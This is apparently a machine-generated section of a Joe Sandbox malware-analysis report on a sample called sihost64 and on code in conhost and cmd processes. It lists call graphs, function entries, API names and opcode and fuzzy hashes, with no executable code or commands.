                                                                                                                                                          execution_graph 291 4023f2 _controlfp 292 4010c4 2 API calls 291->292 293 402473 292->293 277 4022fa 278 40232c 277->278 281 40224f 278->281 280 4023e5 282 402285 281->282 285 4010c4 282->285 284 4022be 284->280 286 402480 285->286 287 4010e7 memset 286->287 288 40115b 287->288 289 401214 sprintf 288->289 290 4012bd 289->290 290->284

                                                                                                                                                          Callgraph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                          • Disassembly available
                                                                                                                                                          callgraph 0 Function_004090C0 1 Function_00401443 2 Function_004010C4 14 Function_004019D8 2->14 15 Function_00401D58 2->15 34 Function_00401000 2->34 46 Function_00401D18 2->46 47 Function_00401C98 2->47 59 Function_00401D98 2->59 3 Function_004017C6 4 Function_004024C7 5 Function_004022CB 6 Function_0040224F 6->2 18 Function_00402158 6->18 25 Function_004021EC 6->25 7 Function_00401BD8 27 Function_004018EF 7->27 8 Function_00401F58 8->27 9 Function_00401DD8 9->27 10 Function_00401C58 10->27 11 Function_00401B58 11->27 12 Function_00401AD8 12->27 13 Function_00401A58 13->27 14->27 15->27 16 Function_00401CD8 16->27 17 Function_00402058 17->27 19 Function_004020D8 19->27 20 Function_00401FD8 20->27 21 Function_00401E58 21->27 22 Function_00401ED8 22->27 23 Function_00409CDA 24 Function_004021E5 26 Function_0040946D 64 Function_004014B4 27->64 28 Function_00401970 29 Function_004023F2 29->2 30 Function_00409E76 31 Function_00402477 32 Function_00409678 33 Function_004022FA 33->6 35 Function_00409004 36 Function_00401784 37 Function_00409384 38 Function_00409686 39 Function_00402487 40 Function_00409989 41 Function_00409D8A 42 Function_00409290 43 Function_00402497 44 Function_00401E98 44->27 45 Function_00401F98 45->27 46->27 47->27 48 Function_00401B18 48->27 49 Function_00401A18 49->27 50 Function_00401998 50->27 51 Function_00401A98 51->27 52 Function_00401B98 52->27 53 Function_00401C18 53->27 54 Function_00402118 54->27 55 Function_00401F18 55->27 56 Function_00402098 56->27 57 Function_00402018 57->27 58 Function_00401E18 58->27 59->27 60 Function_00409D9A 61 Function_00409D22 62 Function_004024A7 63 Function_004094AC 64->1 64->28 65 Function_004024B7 66 Function_004096B7 67 Function_004092B8 68 Function_004010BD

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 004010C4 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetsprintf
                                                                                                                                                          • String ID: /sihost64
                                                                                                                                                          • API String ID: 4041149307-4205773068
                                                                                                                                                          • Opcode ID: 66d0c5e9331e1fd29723943745fff3ffa09bb61aa48dcd65c838924c585c62f8
                                                                                                                                                          • Instruction ID: 654ac478bb083c7dac971cee53f44a8cfd7553f7e00f020489cf52e211e71c4f
                                                                                                                                                          • Opcode Fuzzy Hash: 66d0c5e9331e1fd29723943745fff3ffa09bb61aa48dcd65c838924c585c62f8
                                                                                                                                                          • Instruction Fuzzy Hash: 69712961702B148DEB909B27DC5139A37A8B749BC8F804176EE4CA7B98EE3CCA44C744
                                                                                                                                                          Function 00401000 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                                                                                                          Strings
                                                                                                                                                          • kz^)/-^gbp-ymn+(7nyp,[p(=eggazb/, xrefs: 00401098
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: kz^)/-^gbp-ymn+(7nyp,[p(=eggazb/
                                                                                                                                                          • API String ID: 0-1472292774
                                                                                                                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                                                                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                                                                                                          Function 004022FA Relevance: .1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                                                                                                                          • Instruction ID: 58fa82481bd9f7f1a31c280291aa64e56759039c55656078795ddd0d8845b760
                                                                                                                                                          • Opcode Fuzzy Hash: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                                                                                                                          • Instruction Fuzzy Hash: E3212BA4301A148CEA80DB67DE5539937A4B74DFC8F80443AAF4CB73A5EEBCD9018358
                                                                                                                                                          Function 0040224F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          • Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetsprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4041149307-0
                                                                                                                                                          • Opcode ID: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                                                                                                                          • Instruction ID: 92290081071787e676730f83583c100b5cfe817de0e22f796d573c3dbb31d607
                                                                                                                                                          • Opcode Fuzzy Hash: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                                                                                                                          • Instruction Fuzzy Hash: CA01A4B6701B588DDB40DF66DD9139837B4B309BC8F00482AAF5CA7B69DA78D6118748

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00000236C6DC2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 5ca1e8f251caffc9e9ff743d2dff2833e08de6578b9c78d39a512240dddc4955
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 36915873B01258ABDB50AF29D41CB6D7399F744B94F49D4229F8B67788DA3CE902C708

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00000236C6DC962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: adc27ef7e94b09abb97d16c73a7640ee48980d5f9c93d90bb65af2e12b6ae937
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 88D1C632A00744B9EB20EF65D45C79D77A8F784788F18A506EECB6B795DB38E280C704
                                                                                                                                                          Function 00000236C6DC7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 80ff42cc9a2ce2996dc13df4609fcbabbcaa6d0ec3c716c3fd823bed6f11826f
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 0C81D520A0024976F650BB26987D399239CAB85780F4CFD1799CB77396DB3CEB45CB18
                                                                                                                                                          Function 00000236C6DC9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: a8f131788aaa732ae3e78abe48e5c1cbda5a25741bcce6828493721a45ececf0
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E451A132100648BAEB74AF12916C35877A8E354BC4F1CA557EACB67B85CB3CE650D709
                                                                                                                                                          Function 00000236C6DC80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: be6cc4829ded1354040b1c877008fa0b7934c6e43afac26f17b71870f11fee1e
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 44510632311A04BADB64EB19D42CF2D7B99E340B84F09D926DAD753788D77CEA81C704
                                                                                                                                                          Function 00000236C6DC9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e8c7ee9c173e1a606beae8f15878534c3c3ed522859cf8c5cf5fea2d4e3ab19c
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 1661E772504BC8A1DB31AF15E05C79AB7A4F784B84F089616EBDA27B95CB3CD290CB04

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000015829E72EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 25b63bda3bbfe732e0150f733a63d47902f5e6ec503e1bd405d8c1a74775edcb
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: DC91477AB41950D7DBA48F25E8007ED7B91F784BD6F5481209E892B788DF74D892C701

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000015829E7962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: a17128bee18a2e383ab3918215f13f4454979575fc103d91d8cebfc129b8a6a7
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 0BD16D3A600B40E6EB60DB65D8813ED7BA0FBA97D9F100115DAC96BB96DFB4C1D1C702
                                                                                                                                                          Function 0000015829E77050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: b9c92120de296d520ebc26313a80fb0d2e7033fe2a5a7a067703e479d30de4bb
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: D981D438600E41E6FB509B659C433E92E91BBC57C2F45402599C87F7A6EFBAC9C2C742
                                                                                                                                                          Function 0000015829E79EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 226a7913e513cf6a09176819d400148314de8f9c9b25701aa4fc6ac6d86a6e46
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 30516F3A204A80EAEB748F21DD443E87BA0F7A4BD6F144515DAD96BB95CFB8C4D0C702
                                                                                                                                                          Function 0000015829E780A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 61b360a65391640be8b9b1b9bbc8836e9cee93b97405782d67717ce549fe0d55
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 3A51E43A311E40EADB54CB55D884BF83B91F3A4BCAF558511DAE96B788DFB8C881C701
                                                                                                                                                          Function 0000015829E79AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e545374dc619337be9ac90d5ed978e6cbf42b64b261ee89bfb2423e452cae98f
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 81617C36504BC4D5DB608B15E8403DABBA0FBD9BD5F044215EBD82BB95DFB8C190CB01

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001D643A62EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: a0beed1ae675444847c231b09b34091c61a4ccc08fba2180db759f705ecc1130
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 43910672B8265087DF64EF29D400BBDB391FB54B98F5591269E8A077D8DB38D893C700

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001D643A6962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: f79a10e038a93774b6220fff7d8fb9d316ad75cb2df6f8cf6ee0ca6ed77e7b0b
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: DCD1A0726867808AEB60EF69D4803ED37A4F755B98F10221AEEC957B9ADB34C4D1C701
                                                                                                                                                          Function 000001D643A67050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 6f3609de3add40878d4193c969aa515023bea9eae821b963944786393ae262e5
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 1781D3707F364186FA54BB2D98813D962D0AB86B80F147127DE89477DADB3AC9C68700
                                                                                                                                                          Function 000001D643A69EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: e8f7cfa4712b6594a73d798c95a161230bff2712cf38c38252805b6215e78158
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
